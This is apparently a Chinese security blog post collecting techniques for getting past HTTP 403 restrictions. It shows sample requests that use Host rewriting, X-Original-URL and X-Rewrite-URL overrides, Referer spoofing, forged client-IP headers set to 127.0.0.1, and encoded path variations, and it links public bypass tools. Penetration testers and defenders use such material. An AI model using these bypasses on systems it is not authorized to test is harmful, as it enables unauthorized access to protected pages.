大柚子

这世界不过如此

概述

针对扫描资产出现403情况,这里摘录一些网上的绕过姿势

绕过姿势

端口利用

扫描主机的端口,找其他开放web服务的端口

修改HOST

不同的域名通过A记录或者CNAME方式可以连接都同一个IP下,同一个IP也可以设置多个不同站点,那我访问不同的域名都转发到同一IP,怎么区分这些不同的站点呢,就是用的Host字段,如果服务器后台解析出Host但是服务器上找不到相应的站点,那么这个连接很可能会被丢弃,从而报错。

很多开发人员并未意识到HTTP HOST头由用户控制,从安全角度来讲,任何用户输入都是认为不安全的。
修改客户端请求头中的Host可以通过修改Host值修改为子域名或者ip来绕过来进行绕过二级域名

覆盖请求URL

有些应用会支持非标准的请求头,尝试使用

X-Original-URL
X-Rewrite-URL
标头绕过Web服务器的认证限制。通过支持
X-Original-URL
X-Rewrite-URL
标头,用户可以使用这俩请求标头覆盖请求URL中的路径,尝试绕过对更高级别的缓存和Web服务器的限制

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
X-Original-URL: /auth/login
Response
HTTP/1.1 200 OK

或者:

Reqeust
GET / HTTP/1.1
X-Rewrite-URL: /auth/login
Response
HTTP/1.1 200 OK

Referer标头绕过

尝试使用Referer标头绕过Web服务器的限制。
介绍:Referer请求头包含了当前请求页面的来源页面的地址,即表示当前页面是通过此来源页面里的链接进入的。服务端一般使用Referer请求头识别访问来源。


Request
GET /auth/login HTTP/1.1
Host: xxx
Response
HTTP/1.1 403 Forbidden

Reqeust
GET / HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

或者

Reqeust
GET /auth/login HTTP/1.1
Host: xxx
ReFerer:https://xxx/auth/login
Response
HTTP/1.1 200 OK

代理IP

一般开发者会通过Nginx代理识别访问端IP限制对接口的访问,尝试使用

X-Forwarded-For
X-Forwared-Host
等标头绕过Web服务器的限制。

X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwared-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

如:

Request
GET /auth/login HTTP/1.1
Response
HTTP/1.1 401 Unauthorized

Reqeust
GET /auth/login HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
Response
HTTP/1.1 200 OK

扩展名绕过

基于扩展名,用于绕过403受限制的目录。


site.com/admin => 403
site.com/admin/ => 200
site.com/admin// => 200
site.com//admin// => 200
site.com/admin/* => 200
site.com/admin/*/ => 200
site.com/admin/. => 200
site.com/admin/./ => 200
site.com/./admin/./ => 200
site.com/admin/./. => 200
site.com/admin/./. => 200
site.com/admin? => 200
site.com/admin?? => 200
site.com/admin??? => 200
site.com/admin..;/ => 200
site.com/admin/..;/ => 200
site.com/%2f/admin => 200
site.com/%2e/admin => 200
site.com/admin%20/ => 200
site.com/admin%09/ => 200
site.com/%20admin%20/ => 200

网上byapss tips

https://kathan19.gitbook.io/howtohunt/status-code-bypass/403bypass
https://github.com/sting8k/BurpSuite_403Bypasser
https://github.com/yunemse48/403bypasser
https://github.com/devploit/dontgo403
https://github.com/daffainfo/bypass-403

来源

https://mp.weixin.qq.com/s/N32dGX3a6OYpaQa4a_EDrQ

https://mp.weixin.qq.com/s?__biz=MzkxODM2MDcxNg==&mid=2247485434&idx=1&sn=e8c5a950ebe5dee18fd86aaba1bdc374&chksm=c1b3c019f6c4490fd58aa746af749349a084f5c38b757fed3f0de5d32f28c693809543d6a6b2&scene=126&sessionid=1658880844&key=e3743bb3a0d660f467b088031b416baf9d1b26840c03292a38472ac436f70809c0d700c2b0d46778317cdc286d28200b05e2e625c3ec4477dca72c3314601f1ddb6269459bdd4d957bf15fdd08a6cde8a405f2a7552af61019526f7ed77cb779c065ec43f61f99f87193bf0df7e8d166423530038d316404e4cb04487e328404&ascene=15&uin=MTA3Mzc3OTIzNQ%3D%3D&devicetype=Windows+Server+2016+x64&version=6307001e&lang=zh_CN&session_us=gh_5ad1c4d7d428&exportkey=ARHT%2FesO2ZRVMnQr5BeMs1k%3D&acctmode=0&pass_ticket=gebQ7UiU4xxYZK1Id9J%2FFbfEDbXy3eHT%2FcCObztwND0PMxsF7cniRFY8SmNFB%2BU3&wx_header=0&fontgear=2

Print Friendly, PDF & Email

发表回复

您的电子邮箱地址不会被公开。